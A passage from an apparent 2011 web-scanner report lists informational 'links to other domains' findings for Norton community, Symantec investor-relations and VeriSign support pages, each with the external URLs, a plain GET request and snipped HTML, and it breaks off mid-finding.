...[SNIP]...
<div id="globalNavMainInner2">
<a href="http://www.symantec.com/business">Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href="http://www.symantec.com/partners">Partners</a>
...[SNIP]...
<div id="globalNavMainInner5">
<a href="http://www.symantec.com/about">About Symantec</a>
...[SNIP]...
<div class="lftNavMainNav">
<a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"><span>
...[SNIP]...
<div class="lftNavMainNav">
<a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN">Find My Order </a>
...[SNIP]...
<li>
<a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/">Norton Update Center</a>
...[SNIP]...
<div class="lwrTopLfPnl_link">
<a onclick="var w = window.open(href, '', 'scrollbars=yes,location=no,menuBar=no,resizable=no,status=no,toolbar=no,width=850,height=550,left=200,top=200'); if(w.blur) w.focus(); return false;" title="" href="http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN">How do I find my version?</a>
...[SNIP]...
<div class="smallBusinessUpgrade positioning">
<a href="https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore">
<img width="305" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_renew_now_305.png"/>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp">Legal Notices</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<span><a target="_blank" href="http://www.myNortonAccount.com ">Norton Account</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas">License Agreements </a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/">Contact Us</a>
...[SNIP]...

14.4. http://community.norton.com/norton/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.norton.com
Path:	/norton/

Issue detail

The page was loaded from a URL containing a query string:

http://community.norton.com/norton/?category.id=nis

The response contains the following links to other domains:

http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/i/rank_icons/admin.gif
http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css
http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png
http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png
http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png
http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://twitter.com/nortonforumsUSA
http://twitter.com/nortononline
http://www.facebook.com/Norton
http://www.lithium.com/
http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif
http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif
http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif
http://www.symantec.com/favicon.ico
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js
http://www.youtube.com/Norton

Request

GET /norton/?category.id=nis HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 61789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
</link>


       <link href="http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css" rel="stylesheet" type="text/css"></link>


           <link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" />

<meta name="om.environment" content="prod" />
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_37" href="#"><img class="" id="display" src="http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-button-facebook" id="lithiumFacebookConnectIcon" href="/t5/Norton-Users-Discussion-Forum/ct-p/nis?category.id=nis"><img class="" id="display_0" src="http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_43" href="/t5/Announcements/bd-p/Announcements"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_1" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_46" href="/t5/Norton-Internet-Security-Norton/bd-p/nis_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_2" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_49" href="/t5/Norton-360/bd-p/Norton_360"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_3" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_52" href="/t5/Norton-Online-Family/bd-p/OnlineFamily"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_4" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_55" href="/t5/Norton-for-Mac/bd-p/norton_mac"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_5" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_58" href="/t5/Norton-Online-Backup/bd-p/NOBU_forum"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_6" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_61" href="/t5/Other-Norton-Products/bd-p/other"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_7" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_64" href="/t5/Forum-Feedback/bd-p/forum_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_8" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_67" href="/t5/Product-Suggestions/bd-p/Suggestions"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_9" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<div style="margin-bottom: 10px; margin-top: 5px;"><a target="_blank" href="http://www.facebook.com/Norton"><img height="16" width="16" style="vertical-align: middle;" alt="Norton on Facebook" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif"/></a> <a target="_blank" href="http://www.facebook.com/Norton">Be a fan on Facebook</a>
...[SNIP]...
<div style="margin-bottom: 10px;"><a target="_blank" href="http://www.youtube.com/Norton"><img height="16" width="16" style="vertical-align: middle;" alt="Subscribe on YouTube" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif"/></a> <a target="_blank" href="http://www.youtube.com/Norton">Subscribe on YouTube</a>
...[SNIP]...
<div style="margin-bottom: 10px;"><a target="_blank" href="http://twitter.com/nortononline"><img height="16" width="16" style="vertical-align: middle;" alt="Follow us on Twitter" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif"/></a> <a target="_blank" href="http://twitter.com/nortonforumsUSA">Follow us on Twitter</a>
...[SNIP]...
<a target="_blank" href="http://de.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Deutsches Norton Forum" src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<a target="_blank" href="http://fr.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Communaut.. Norton" src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<a target="_blank" href="http://communityjp.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="................................." src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<a target="_blank" href="http://bbs.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt=".................." src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<span class="UserName lia-user-name">

       <img class="lia-user-rank-icon-left" title="Administrator" alt="Administrator" id="display_11" src="http://norton.i.lithium.com/i/rank_icons/admin.gif"/>

           <a class="lia-link-navigation lia-page-link lia-user-name-link" style="color:#FF0000" target="_self" id="link_72" href="/t5/user/viewprofilepage/user-id/17">
...[SNIP]...
<div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo">
   <a class="lia-link-navigation" title="Social CRM & Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM & Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_12" src="http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png"/></a>
...[SNIP]...

<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"></script>
...[SNIP]...

14.5. http://investor.symantec.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.symantec.com
Path:	/phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif
http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://widgets.twimg.com/j/2/widget.js
http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en
http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif
http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5
http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm
https://enroll1.icsdelivery.com/symc/Default.aspx

Request

GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=58
Date: Fri, 09 Sep 2011 21:42:06 GMT
Content-Length: 39751
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
</div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /></noscript>
...[SNIP]...
<noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /></noscript>
...[SNIP]...
<td width="100%" valign="middle"><a
class="ccbnLnk"

href="http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm"
target="_new" >Click here for webcast</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1"
target="_new">Q1 FY12 Earnings New Release</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1"
target="_new">Q1 FY12 Supplemental Information</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1"
target="_new">Q1 2012 Earnings ... Prepared Remarks</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1"
target="_new">Historical Compares for Modified Segment Reporting</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1"
target="_new">Q1 FY12 Foreign Currency Update</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1"
target="_new">Convertible Note Dilution FAQ</a>
...[SNIP]...
<td width="100%" valign="middle"><a
class="ccbnLnk"

href="http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5"
target="_new" >Click here for webcast</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1"
target="_new">Presentation</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"

href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1"
target="_new">Transcript</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank">Symantec...s Strategy</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank">Corporate Pitch</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank">Corporate Fact Sheet</a>
...[SNIP]...
<li><a href="http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en" target="_blank">Shareholder Services (Computershare)</a>
...[SNIP]...
<li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank">Request Electronic Delivery</a>
...[SNIP]...
</table><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" /></div>
...[SNIP]...

14.6. http://investor.symantec.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.symantec.com
Path:	/phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

http://investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751

The response contains the following links to other domains:

http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en
http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif
http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif
http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif
https://enroll1.icsdelivery.com/symc/Default.aspx

Request

GET /phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751 HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 18700
Cache-Control: private, max-age=179
Date: Fri, 09 Sep 2011 21:42:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjAzIFBNPC90aW1lU3Rh
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /><br />
...[SNIP]...
<td align="left" width="3%"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif" alt="Listen to the Webcast in Windows Media Player"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /><br />
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1"
target="_new">Press Release</a>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1"
target="_new">Presentation</a>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1"
target="_new">FAQ</a>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/> </td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1"
target="_new">Symantec to Acquire VeriSign...s Security Business Transcript</a>
...[SNIP]...
<BR><IMG src="http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif" alt=ThomsonReuters.com border=0 align=center VALIGN=TOP><BR>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank">Symantec...s Strategy</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank">Corporate Pitch</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1" target="_blank">Corporate Fact Sheet</a>
...[SNIP]...
<li><a href="http://www-us.computershare.com/default.asp?bhjs=1&fla=1&cc=CA&lang=en" target="_blank">Shareholder Services (Computershare)</a>
...[SNIP]...
<li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank">Request Electronic Delivery</a>
...[SNIP]...

14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport

The response contains the following links to other domains:

https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

